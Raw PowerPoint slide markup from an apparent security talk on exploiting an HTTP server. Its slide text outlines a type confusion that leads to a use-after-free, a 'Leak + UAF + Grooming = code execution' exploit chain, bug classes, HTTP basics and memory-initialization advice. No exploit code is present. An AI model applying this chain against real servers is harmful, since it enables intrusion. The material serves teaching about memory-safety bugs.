            <a:ext cx="0" cy="151025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445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1" y="4443261"/>
            <a:ext cx="8965769" cy="994172"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploitability – Type Confusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8913FA34-CFFC-0B4B-B9F4-9B08F4DB750F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5067946" y="3733172"/>
            <a:ext cx="1797803" cy="2431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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E04B651-746F-8B40-9C29-B84D75FD02E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-79302"/>
            <a:ext cx="2239501" cy="1241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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Free()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="Table&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C9832B7-6A60-D14C-BD7D-F5AE0370F226}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="47029"/>
            <a:ext cx="8660109" cy="2353290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Straight Connector 9" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9166543-D6B9-6444-944D-69773E182066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4846447" y="984969"/>
            <a:ext cx="0" cy="151025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descr="Out of bounds free">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5145D58-329F-304C-8449-8448ED61C7A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4424766" y="2507181"/>
            <a:ext cx="4719234" cy="2195889"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Connector 12" descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B1769EE-EBF1-5E4B-BD88-4D58B0CBE71D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277456" y="1987192"/>
            <a:ext cx="83626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Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C04820-02D2-B64B-BC71-E12D352EFD1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386380" y="1292351"/>
            <a:ext cx="14600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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B0E86B-669E-1A4D-B273-6E586B2AB34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277456" y="1292351"/>
            <a:ext cx="83626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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83C97948-8C47-E44C-854D-F66C3727EE7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386380" y="2021597"/>
            <a:ext cx="14600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descr="Type confusion on routes array and a header">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21104E24-F189-5443-B67F-A4B2876CF9A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4116413" y="469184"/>
            <a:ext cx="14600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17744BF7-6BF4-B945-A9A3-ECCBA3C024DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="100744" y="2495227"/>
            <a:ext cx="4324018" cy="2162014"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>res_header_lst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0x20] </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>== </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>routes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Free the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>routes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> pointer! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Avenir Book" panose="02000503020000020003" pitchFamily="2" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Disgusting UAF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D86657BC-7DB0-5246-837C-3711926B5B58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638833" y="3256978"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15E3E8F5-081E-5041-87F5-8F0FBD30235A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670791" y="3523322"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C6DE2B8-9E18-7549-A8B1-617AB8CFA9EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4670791" y="3789665"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{347B5BA1-FB59-3A4F-A982-243AFAE3B0E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4825125" y="959041"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA922AD0-6DA6-7E49-A9AD-5238EB0EE489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4835786" y="1638881"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E035FB1-51B3-6B4E-9F3B-5515608F5CCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467993" y="34932"/>
            <a:ext cx="829160" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1077463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66D0-C7B7-C244-A27D-085A437B5C26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Full Exploit Chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38057F4-E4FE-8547-B43C-F45981B2E7A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Leak + UAF + Grooming = code execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2841203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D2C2-E34C-164F-A6A8-505DDF56DE4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Info Leak</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2" descr="Leak Detection with Penetrant Testing Process">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC9B3BFE-32DA-D84D-B629-F14A703492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944" b="10410"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="628650" y="1236541"/>
            <a:ext cx="7886700" cy="3263504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2578746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A0BE-1907-0C4F-9EED-74C4DAD11BF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="273847"/>
            <a:ext cx="7886700" cy="994172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E97E9D89-BE67-4854-BC65-2934905CBA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3089248317"/>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6878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D20A-0F48-CF4D-BDCF-C7F62B716B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP/1.1 Protocol From Afar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDB95EEC-6237-0D48-BA01-903A509C1966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypertext Transfer Protocol (HTTP) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Human readable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newline (\r\n) based protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Three distinct parts: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Headers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9245386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C148-281A-6044-8784-17A43D1282FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Proper Way To Initialize Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D50EC4-7E72-3D4B-907B-67870C395D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1686757"/>
            <a:ext cx="7886700" cy="2813288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set all of the bytes in the pointer to NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Guarantees that everything in initializes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function does this well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Setting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> fields/bytes works as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easy to make a mistake here </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
